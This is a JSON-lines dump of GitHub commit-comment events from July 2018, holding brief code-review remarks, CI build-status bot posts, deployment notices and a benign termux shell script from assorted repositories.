{"id":"8026378492","type":"CommitCommentEvent","actor":{"login":"jess18"},"repo":{"name":"jess18/stop-github-from-auto-repository-"},"payload":{"comment":{"id":29853312,"position":null,"line":null,"path":null,"commit_id":"0407e29a98f092a87ad0cfe8128f6a9092998783","created_at":"2018-07-27T03:39:03Z","updated_at":"2018-07-27T03:39:03Z","author_association":"OWNER","body":"Travis I’m going to kill u"}},"created_at":"2018-07-27T03:39:03Z"}
{"id":"8026382794","type":"CommitCommentEvent","actor":{"login":"MiniShroudInTraining"},"repo":{"name":"w3x731/survivIoAim"},"payload":{"comment":{"id":29853319,"position":null,"line":null,"path":null,"commit_id":"8dc6568890182f7e890f85cc088cd7d3e29aee8f","created_at":"2018-07-27T03:40:51Z","updated_at":"2018-07-27T03:40:51Z","author_association":"NONE","body":"Hey it got patched i was in the middle of a game and it all stopped and it kicked me from that server!\r\nidk if it was a glitch or got patched."}},"created_at":"2018-07-27T03:40:51Z"}
{"id":"8026385124","type":"CommitCommentEvent","actor":{"login":"zxzxde"},"repo":{"name":"ThinkboxSoftware/HoudiniPRTExporter"},"payload":{"comment":{"id":29853325,"position":null,"line":null,"path":null,"commit_id":"0f0b7a2fafeb437ad537f2aa846bf64dad68a5c8","created_at":"2018-07-27T03:41:48Z","updated_at":"2018-07-27T03:41:48Z","author_association":"NONE","body":"Is there a 16.5 version?"}},"created_at":"2018-07-27T03:41:48Z"}
{"id":"8026387332","type":"CommitCommentEvent","actor":{"login":"tony11tony11t"},"repo":{"name":"tony11tony11t/homework-index-"},"payload":{"comment":{"id":29853328,"position":null,"line":null,"path":null,"commit_id":"5b673b2082f5456b712f780bbb1d6af219cef87a","created_at":"2018-07-27T03:42:44Z","updated_at":"2018-07-27T03:42:44Z","author_association":"OWNER","body":"酷炫"}},"created_at":"2018-07-27T03:42:44Z"}
{"id":"8026390261","type":"CommitCommentEvent","actor":{"login":"VinceBurn"},"repo":{"name":"nicklockwood/SwiftFormat"},"payload":{"comment":{"id":29853335,"position":null,"line":null,"path":null,"commit_id":"3173c425c322efa40760b6c339a13bdeaf80aa52","created_at":"2018-07-27T03:43:58Z","updated_at":"2018-07-27T03:43:58Z","author_association":"CONTRIBUTOR","body":"@nicklockwood  great job on all those commit about the extension, thanks on the follow up. Great job.\r\n\r\n"}},"created_at":"2018-07-27T03:43:58Z"}
{"id":"8026396131","type":"CommitCommentEvent","actor":{"login":"annekemyers"},"repo":{"name":"annekemyers/annekemyers.github.io"},"payload":{"comment":{"id":29853348,"position":null,"line":null,"path":null,"commit_id":"300d6a8532c493cff1d31a167ce561342d7ac981","created_at":"2018-07-27T03:46:23Z","updated_at":"2018-07-27T03:46:23Z","author_association":"OWNER","body":"test commit"}},"created_at":"2018-07-27T03:46:23Z"}
{"id":"8026399255","type":"CommitCommentEvent","actor":{"login":"congkxtb98"},"repo":{"name":"Moon-Blood/Moon-Blood"},"payload":{"comment":{"id":29853351,"position":null,"line":null,"path":null,"commit_id":"5ebb6b9b7d8192a97fc02751241fe5c05a54a450","created_at":"2018-07-27T03:47:38Z","updated_at":"2018-07-27T03:47:38Z","author_association":"CONTRIBUTOR","body":"good"}},"created_at":"2018-07-27T03:47:38Z"}
{"id":"8026399644","type":"CommitCommentEvent","actor":{"login":"20086996"},"repo":{"name":"20086996/yunwei"},"payload":{"comment":{"id":29853352,"position":2,"line":284,"path":"src/main/java/com/hisun/ccopom/controller/AccountIpController.java","commit_id":"973960e8a0542bb7f23cda2a10e5db5cd7178899","created_at":"2018-07-27T03:47:47Z","updated_at":"2018-07-27T03:47:47Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-27T03:47:47Z"}
{"id":"8026403263","type":"CommitCommentEvent","actor":{"login":"Jorlost19"},"repo":{"name":"LambdaSchool/Lambda-Hello"},"payload":{"comment":{"id":29853357,"position":null,"line":null,"path":null,"commit_id":"49cc5bc96b37b4453c5fc994e97eec91db9578e4","created_at":"2018-07-27T03:49:20Z","updated_at":"2018-07-27T03:49:20Z","author_association":"NONE","body":"\"Core Hello Challenge\". @gikko"}},"created_at":"2018-07-27T03:49:20Z"}
{"id":"8026403419","type":"CommitCommentEvent","actor":{"login":"Bivuti"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29853358,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-27T03:49:24Z","updated_at":"2018-07-27T03:49:24Z","author_association":"NONE","body":"@punchcutter Here is more Chakma Corpus. All most done. 99% is OK all of this data as up to date:  \r\nhttps://github.com/korero/corpora-ccp\r\nhttps://github.com/korero/corpora-ccp/blob/master/ccp_fulbareng.html\r\nhttps://github.com/korero/corpora-ccp/blob/master/ccp_pacchan.html\r\nhttps://github.com/korero/corpora-ccp/blob/master/ccp_shikya_pudhi.html\r\nhttps://github.com/korero/corpora-ccp/blob/master/ccp_tui_ebe_vili.html\r\n\r\nBut now cause a problem with Ekaara E (U+1112C) with Maayyaa (U+11134) with Virama (U+11133) as to use OpenType’s USE overrides. Here is examples:\r\nIn NotePad:\r\n![red blue](https://user-images.githubusercontent.com/13092086/43300361-a196cc2c-9180-11e8-8bf7-ff65d8fe35df.PNG)\r\n\r\nOn the other hand, the same text browser rendering correctly, although actually it's not correct. Please see:\r\n![red and blue - browser](https://user-images.githubusercontent.com/13092086/43300411-f337ce1e-9180-11e8-91f9-5e9d6fd2fefa.PNG)\r\n\r\nNote: Blue circle mark is another case. For example U+11145 (𑅅) and U+11146 (𑅆) need to update and should text correction accordingly. \r\n\r\nIn the Chakma (ccp) Wiki most of the link not updated yet. Please see more: \r\nhttps://incubator.wikimedia.org/wiki/Category:Wp/ccp\r\n\r\nWe should correction these text data accordingly. "}},"created_at":"2018-07-27T03:49:24Z"}
{"id":"8026405065","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853362,"position":null,"line":null,"path":null,"commit_id":"dfb96fb464dd848bca0086b803e95bbbd7e1d7c0","created_at":"2018-07-27T03:50:07Z","updated_at":"2018-07-27T03:50:07Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: OK (2951 of 2951 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T03:50:07Z"}
{"id":"8026409983","type":"CommitCommentEvent","actor":{"login":"futureMegao"},"repo":{"name":"alfhen/vue-cookie"},"payload":{"comment":{"id":29853368,"position":3,"line":2,"path":"src/vue-cookie.js","commit_id":"f6ada694bbd60ec34afa05d81c4c4e191039fc4f","created_at":"2018-07-27T03:52:09Z","updated_at":"2018-07-27T03:52:09Z","author_association":"NONE","body":"dff"}},"created_at":"2018-07-27T03:52:09Z"}
{"id":"8026410766","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853370,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-27T03:52:27Z","updated_at":"2018-07-27T03:52:27Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2323 of 2327 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 649\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-27T03:52:27Z"}
{"id":"8026414166","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853377,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-27T03:53:48Z","updated_at":"2018-07-27T03:53:48Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-59ea6ca48c7ba5202ee14daa752709e02e5edbe1-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T03:53:48Z"}
{"id":"8026417694","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29853424,"position":null,"line":null,"path":null,"commit_id":"4b8c697be086c2830d66413f9c16eb50e0ecc45a","created_at":"2018-07-27T03:55:15Z","updated_at":"2018-07-27T03:55:15Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-27T03:55:15Z"}
{"id":"8026420851","type":"CommitCommentEvent","actor":{"login":"MuhammadAkif"},"repo":{"name":"AtaMuhiuldin/NODE"},"payload":{"comment":{"id":29853428,"position":74,"line":62,"path":"src/App.jsx","commit_id":"a8965b8cddf72c8dee9ad1f1913afe58363a6afc","created_at":"2018-07-27T03:56:34Z","updated_at":"2018-07-27T03:56:34Z","author_association":"COLLABORATOR","body":"remove this console."}},"created_at":"2018-07-27T03:56:34Z"}
{"id":"8026423723","type":"CommitCommentEvent","actor":{"login":"MuhammadAkif"},"repo":{"name":"AtaMuhiuldin/NODE"},"payload":{"comment":{"id":29853432,"position":116,"line":104,"path":"src/App.jsx","commit_id":"a8965b8cddf72c8dee9ad1f1913afe58363a6afc","created_at":"2018-07-27T03:57:43Z","updated_at":"2018-07-27T03:57:43Z","author_association":"COLLABORATOR","body":"remove all debuggers."}},"created_at":"2018-07-27T03:57:43Z"}
{"id":"8026424348","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29853434,"position":31,"line":26,"path":"order/serializers.py","commit_id":"88ae792add96db008aa53f562e390c32b34d654d","created_at":"2018-07-27T03:57:59Z","updated_at":"2018-07-27T03:57:59Z","author_association":"NONE","body":"ValidationError есть в форме и в модельках. Это есть и в serializers.\r\nТак что тут лучше использовать raise serializers.ValidationError"}},"created_at":"2018-07-27T03:57:59Z"}
{"id":"8026428665","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29853447,"position":null,"line":null,"path":null,"commit_id":"ce1c744ee260510eb5239fcd4059bef9133178ea","created_at":"2018-07-27T03:59:48Z","updated_at":"2018-07-27T03:59:48Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://allenfearp-static-docs.pantheonsite.io/docs/support)\n"}},"created_at":"2018-07-27T03:59:48Z"}
{"id":"8026429009","type":"CommitCommentEvent","actor":{"login":"MuhammadAkif"},"repo":{"name":"AtaMuhiuldin/NODE"},"payload":{"comment":{"id":29853449,"position":8,"line":7,"path":"src/App.jsx","commit_id":"a8965b8cddf72c8dee9ad1f1913afe58363a6afc","created_at":"2018-07-27T03:59:57Z","updated_at":"2018-07-27T03:59:57Z","author_association":"COLLABORATOR","body":"remove clock functionality and make your project clean so that i can review it properly. Also please indent your code :) "}},"created_at":"2018-07-27T03:59:57Z"}
{"id":"8026430620","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29853457,"position":16,"line":16,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java","commit_id":"66cbaced606df789f6271e3af09a9dca0fd9fb56","created_at":"2018-07-27T04:00:31Z","updated_at":"2018-07-27T04:00:31Z","author_association":"NONE","body":"Package should be:\r\n```java\r\npackage io.opencensus.contrib.zpages;\r\n```\r\n\r\nAlso, `Style` doesn't need to be public. The default visibility is package-visible, so you only need:\r\n```java\r\nfinal class Style {\r\n   static final String STYLE = ...;\r\n}\r\n```"}},"created_at":"2018-07-27T04:00:31Z"}
{"id":"8026430731","type":"CommitCommentEvent","actor":{"login":"1358snowywolf"},"repo":{"name":"1358snowywolf/Leetcode"},"payload":{"comment":{"id":29853458,"position":28,"line":313,"path":"Leetcode/src/com/company/Main.java","commit_id":"8434a1689d892cfbbafbf3003004e8e4d08c8666","created_at":"2018-07-27T04:00:34Z","updated_at":"2018-07-27T04:00:34Z","author_association":"OWNER","body":"Dad wrote this"}},"created_at":"2018-07-27T04:00:34Z"}
{"id":"8026431381","type":"CommitCommentEvent","actor":{"login":"yu111111111"},"repo":{"name":"yu111111111/SpringcloudConfig"},"payload":{"comment":{"id":29853461,"position":1,"line":1,"path":"respo/config-client-dev.properties","commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-27T04:00:51Z","updated_at":"2018-07-27T04:00:51Z","author_association":"OWNER","body":"foo = foo version 5"}},"created_at":"2018-07-27T04:00:51Z"}
{"id":"8026431405","type":"CommitCommentEvent","actor":{"login":"1358snowywolf"},"repo":{"name":"1358snowywolf/Leetcode"},"payload":{"comment":{"id":29853462,"position":28,"line":313,"path":"Leetcode/src/com/company/Main.java","commit_id":"8434a1689d892cfbbafbf3003004e8e4d08c8666","created_at":"2018-07-27T04:00:52Z","updated_at":"2018-07-27T04:00:52Z","author_association":"OWNER","body":"just for kicks"}},"created_at":"2018-07-27T04:00:52Z"}
{"id":"8026433683","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29853464,"position":8,"line":7,"path":"order/serializers.py","commit_id":"88ae792add96db008aa53f562e390c32b34d654d","created_at":"2018-07-27T04:01:39Z","updated_at":"2018-07-27T04:01:39Z","author_association":"NONE","body":"status_code возвразается с response, а response в Django возвращает views.py"}},"created_at":"2018-07-27T04:01:39Z"}
{"id":"8026434895","type":"CommitCommentEvent","actor":{"login":"jess18"},"repo":{"name":"jess18/stop-github-from-auto-repository-"},"payload":{"comment":{"id":29853468,"position":null,"line":null,"path":null,"commit_id":"0407e29a98f092a87ad0cfe8128f6a9092998783","created_at":"2018-07-27T04:02:09Z","updated_at":"2018-07-27T04:02:09Z","author_association":"OWNER","body":"Delete\nAlll\n\nOn Thu, Jul 26, 2018 at 11:39 PM jess18 <notifications@github.com> wrote:\n\n> Travis I’m going to kill u\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jess18/stop-github-from-auto-repository-/commit/0407e29a98f092a87ad0cfe8128f6a9092998783#commitcomment-29853312>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am0r9eUBR-C8fcvJSj0-xQsWskmVu6HEks5uKotXgaJpZM4Vi3RD>\n> .\n>\n-- \nJessie lynn\n"}},"created_at":"2018-07-27T04:02:09Z"}
{"id":"8026436290","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29853470,"position":null,"line":null,"path":null,"commit_id":"d00508ad18e07c95b41e42ecd0080e9d1cc28342","created_at":"2018-07-27T04:02:45Z","updated_at":"2018-07-27T04:02:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-987](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-987).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-987-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T04:02:45Z"}
{"id":"8026440182","type":"CommitCommentEvent","actor":{"login":"SergeyMoiseenko"},"repo":{"name":"brrMeow/geeknight-starter"},"payload":{"comment":{"id":29853476,"position":93,"line":329,"path":"client/app/pirates/pirates.component.ts","commit_id":"0380e350b738a1d85acedf38fb5955109f47ea73","created_at":"2018-07-27T04:04:27Z","updated_at":"2018-07-27T04:04:27Z","author_association":"NONE","body":"цикл `for` лучше заменить на `forEach` по массиву `data`"}},"created_at":"2018-07-27T04:04:27Z"}
{"id":"8026441076","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29853478,"position":14,"line":14,"path":"src/graphics/GUI.java","commit_id":"8d6fe67bb3c1d9dd9b81f20e5854a0526b14e852","created_at":"2018-07-27T04:04:50Z","updated_at":"2018-07-27T04:04:50Z","author_association":"CONTRIBUTOR","body":"Forgot to note that these values were gotten by dividing the window dimensions Ben put (800x600px) by my desktop resolution since you guys liked the scale preview I sent over Skype. Feel free to change --- it's not hard."}},"created_at":"2018-07-27T04:04:50Z"}
{"id":"8026448854","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29853501,"position":null,"line":null,"path":null,"commit_id":"3b9c17ffd8ce758c87d36144290e77a9d5d261dc","created_at":"2018-07-27T04:08:15Z","updated_at":"2018-07-27T04:08:15Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://allenfearp-static-docs.pantheonsite.io/docs/support)\n"}},"created_at":"2018-07-27T04:08:15Z"}
{"id":"8026451199","type":"CommitCommentEvent","actor":{"login":"TheHasnatBD"},"repo":{"name":"TheHasnatBD/uMe"},"payload":{"comment":{"id":29853513,"position":null,"line":null,"path":null,"commit_id":"62c5fc7653ee192a7ac516b8b79b52eaa30d1bf2","created_at":"2018-07-27T04:09:21Z","updated_at":"2018-07-27T04:09:21Z","author_association":"OWNER","body":"a logical works in index.js file"}},"created_at":"2018-07-27T04:09:21Z"}
{"id":"8026462060","type":"CommitCommentEvent","actor":{"login":"IFYBENZ"},"repo":{"name":"bitfwdcommunity/Issue-your-own-ERC20-token"},"payload":{"comment":{"id":29853529,"position":4,"line":4,"path":"contracts/erc20_tutorial.sol","commit_id":"c109cf848e0ec64655a48ebdc7e20cfc4e2392eb","created_at":"2018-07-27T04:14:22Z","updated_at":"2018-07-27T04:14:22Z","author_association":"NONE","body":"BEST TOKEN\r\n"}},"created_at":"2018-07-27T04:14:22Z"}
{"id":"8026462409","type":"CommitCommentEvent","actor":{"login":"yu111111111"},"repo":{"name":"yu111111111/SpringcloudConfig"},"payload":{"comment":{"id":29853530,"position":1,"line":1,"path":"respo/config-client-dev.properties","commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-27T04:14:33Z","updated_at":"2018-07-27T04:14:33Z","author_association":"OWNER","body":"foo = foo version 5"}},"created_at":"2018-07-27T04:14:33Z"}
{"id":"8026462539","type":"CommitCommentEvent","actor":{"login":"bsclifton"},"repo":{"name":"brave/browser-laptop-bootstrap"},"payload":{"comment":{"id":29853531,"position":null,"line":null,"path":null,"commit_id":"eeeeff9af860508bf8319b29ca00d5fafc595756","created_at":"2018-07-27T04:14:36Z","updated_at":"2018-07-27T04:14:36Z","author_association":"MEMBER","body":"🎉 "}},"created_at":"2018-07-27T04:14:36Z"}
{"id":"8026467554","type":"CommitCommentEvent","actor":{"login":"lfguoheng"},"repo":{"name":"lfguoheng/web_vue_elemrnt_test"},"payload":{"comment":{"id":29853542,"position":null,"line":null,"path":null,"commit_id":"aa316709a280acf12a538470f20f9ca42aa2e131","created_at":"2018-07-27T04:16:56Z","updated_at":"2018-07-27T04:16:56Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-27T04:16:56Z"}
{"id":"8026469285","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29853544,"position":8,"line":4,"path":"www/home.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-27T04:17:44Z","updated_at":"2018-07-27T04:17:44Z","author_association":"NONE","body":"Exit after header."}},"created_at":"2018-07-27T04:17:44Z"}
{"id":"8026473889","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29853549,"position":31,"line":24,"path":"www/newindex.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-27T04:19:53Z","updated_at":"2018-07-27T04:19:53Z","author_association":"NONE","body":"Reset the cookie if failed."}},"created_at":"2018-07-27T04:19:53Z"}
{"id":"8026476432","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29853551,"position":28,"line":21,"path":"www/newindex.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-27T04:21:02Z","updated_at":"2018-07-27T04:21:02Z","author_association":"NONE","body":"注意18, 20, 21行的格式。"}},"created_at":"2018-07-27T04:21:02Z"}
{"id":"8026477962","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29853554,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T04:21:46Z","updated_at":"2018-07-27T04:21:46Z","author_association":"NONE","body":"159344647-Different-heat-transfer-algorithms-from-reverse-constructions (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2344 of 2344 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T04:21:46Z"}
{"id":"8026480348","type":"CommitCommentEvent","actor":{"login":"cvirostek"},"repo":{"name":"cvirostek/termux-api"},"payload":{"comment":{"id":29853555,"position":null,"line":null,"path":null,"commit_id":"f446c6845c424120bb9519b26d507b6031cd61bf","created_at":"2018-07-27T04:22:50Z","updated_at":"2018-07-27T04:22:50Z","author_association":"OWNER","body":"Note: the termux-storage-get script must be updated as well:\r\n\r\n```\r\n#!/data/data/com.termux/files/usr/bin/sh\r\nset -e -u\r\n\r\nSCRIPTNAME=termux-storage-get\r\nshow_usage () {\r\n    echo \"Usage: $SCRIPTNAME [path]\"\r\n    echo \"Request a file from the system and output it to the specified path, or the current directory if no path is specified.\"\r\n    exit 0\r\n}\r\n\r\n\r\nwhile getopts :h option\r\ndo\r\n    case \"$option\" in\r\n        h) show_usage;;\r\n        ?) echo \"$SCRIPTNAME: illegal option -$OPTARG\"; exit 1;\r\n    esac\r\ndone\r\nshift $(($OPTIND-1))\r\n\r\nif [ $# -gt 1 ]; then echo \"$SCRIPTNAME: too many arguments\"; exit 1; fi\r\nif [ $# -lt 1 ]; then set '.'; fi\r\n\r\n/data/data/com.termux/files/usr/libexec/termux-api StorageGet --es path \"`realpath \"$1\"`\"\r\n```"}},"created_at":"2018-07-27T04:22:50Z"}
{"id":"8026503989","type":"CommitCommentEvent","actor":{"login":"GermanBluefox"},"repo":{"name":"foxriver76/ioBroker.denon"},"payload":{"comment":{"id":29853607,"position":9,"line":290,"path":"io-package.json","commit_id":"761a8833cdc9f4b5c4dc469fad3db4b5ebdfca81","created_at":"2018-07-27T04:33:38Z","updated_at":"2018-07-27T04:33:38Z","author_association":"NONE","body":"button.play"}},"created_at":"2018-07-27T04:33:38Z"}
{"id":"8026504125","type":"CommitCommentEvent","actor":{"login":"rajbhagatt"},"repo":{"name":"rajbhagatt/KSNDMCViz.github.io"},"payload":{"comment":{"id":29853609,"position":4,"line":9,"path":"index.html","commit_id":"c161cca50382f36a7b1dc10b400a7234d5dda3b1","created_at":"2018-07-27T04:33:42Z","updated_at":"2018-07-27T04:33:42Z","author_association":"OWNER","body":"Deleting the source"}},"created_at":"2018-07-27T04:33:42Z"}
{"id":"8026504871","type":"CommitCommentEvent","actor":{"login":"GermanBluefox"},"repo":{"name":"foxriver76/ioBroker.denon"},"payload":{"comment":{"id":29853610,"position":23,"line":304,"path":"io-package.json","commit_id":"761a8833cdc9f4b5c4dc469fad3db4b5ebdfca81","created_at":"2018-07-27T04:34:03Z","updated_at":"2018-07-27T04:34:03Z","author_association":"NONE","body":"button.pause"}},"created_at":"2018-07-27T04:34:03Z"}
{"id":"8026507079","type":"CommitCommentEvent","actor":{"login":"mdimtiazali"},"repo":{"name":"mdimtiazali/Git-Remote-Server"},"payload":{"comment":{"id":29853614,"position":null,"line":null,"path":null,"commit_id":"207f77a095336850bbfcf59e7a986a376fb8f9db","created_at":"2018-07-27T04:35:02Z","updated_at":"2018-07-27T04:35:02Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-27T04:35:02Z"}
{"id":"8026518076","type":"CommitCommentEvent","actor":{"login":"Lipnevich"},"repo":{"name":"Lipnevich/noxbox"},"payload":{"comment":{"id":29853630,"position":97,"line":105,"path":"app/src/main/java/by/nicolay/lipnevich/noxbox/detailed/DetailedNoxboxPage.java","commit_id":"5d70027e2ee3a098d4c32696fae79d8da2781a3e","created_at":"2018-07-27T04:39:59Z","updated_at":"2018-07-27T04:39:59Z","author_association":"OWNER","body":"Постарайся избегать этой аннотации, предупреждение об отсутствии переводов помогает нам не забыть перенести строки в strings.xml"}},"created_at":"2018-07-27T04:39:59Z"}
{"id":"8026520569","type":"CommitCommentEvent","actor":{"login":"mdimtiazali"},"repo":{"name":"mdimtiazali/Git-Remote-Server"},"payload":{"comment":{"id":29853634,"position":null,"line":null,"path":null,"commit_id":"207f77a095336850bbfcf59e7a986a376fb8f9db","created_at":"2018-07-27T04:41:08Z","updated_at":"2018-07-27T04:41:08Z","author_association":"OWNER","body":"456"}},"created_at":"2018-07-27T04:41:08Z"}
{"id":"8026524846","type":"CommitCommentEvent","actor":{"login":"austintackaberry"},"repo":{"name":"codeclubsocial/codeclub_website_dev"},"payload":{"comment":{"id":29853636,"position":null,"line":null,"path":null,"commit_id":"e30b707d686365bf22b5fc2d70a3fbf33c76f450","created_at":"2018-07-27T04:43:06Z","updated_at":"2018-07-27T04:43:06Z","author_association":"CONTRIBUTOR","body":"Woah, been awhile since I've seen any action over here :wink: "}},"created_at":"2018-07-27T04:43:06Z"}
{"id":"8026524925","type":"CommitCommentEvent","actor":{"login":"Lipnevich"},"repo":{"name":"Lipnevich/noxbox"},"payload":{"comment":{"id":29853637,"position":139,"line":130,"path":"app/src/main/java/by/nicolay/lipnevich/noxbox/detailed/DetailedNoxboxPage.java","commit_id":"5d70027e2ee3a098d4c32696fae79d8da2781a3e","created_at":"2018-07-27T04:43:08Z","updated_at":"2018-07-27T04:43:08Z","author_association":"OWNER","body":"Вместо listenProfile можно в метод drawPrice передать профиль и напрямую использовать его в onClick"}},"created_at":"2018-07-27T04:43:08Z"}
{"id":"8026526149","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29853639,"position":22,"line":134,"path":"src/pow_fpga_accel.c","commit_id":"27a31fd45bb964e2511712e8eee628d36282e4a7","created_at":"2018-07-27T04:43:41Z","updated_at":"2018-07-27T04:43:41Z","author_association":"OWNER","body":"老師好，\r\n\r\n我對某commit 做 get rebase -i 去修過去commit message，修改完，git push -f 之後發現此留言被刪除.\r\n這樣是否正常？ 或者有其他方式避免留言被刪除？\r\n\r\n感謝指教\r\n-AjMaChInE\r\n\r\nJim Huang <notifications@github.com> 於 2018年7月26日週四 21:50 寫道：\r\n\r\n> What are your considerations to use buffered I/O functions such as fwrite\r\n> instead of low-level I/O ones (such as write)?\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/ajblane/dcurl/commit/27a31fd45bb964e2511712e8eee628d36282e4a7#commitcomment-29844188>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AFF2eid_I_sjPZlhMH4C3yetXDq3c8q_ks5uKckMgaJpZM4Vh2zs>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-27T04:43:41Z"}
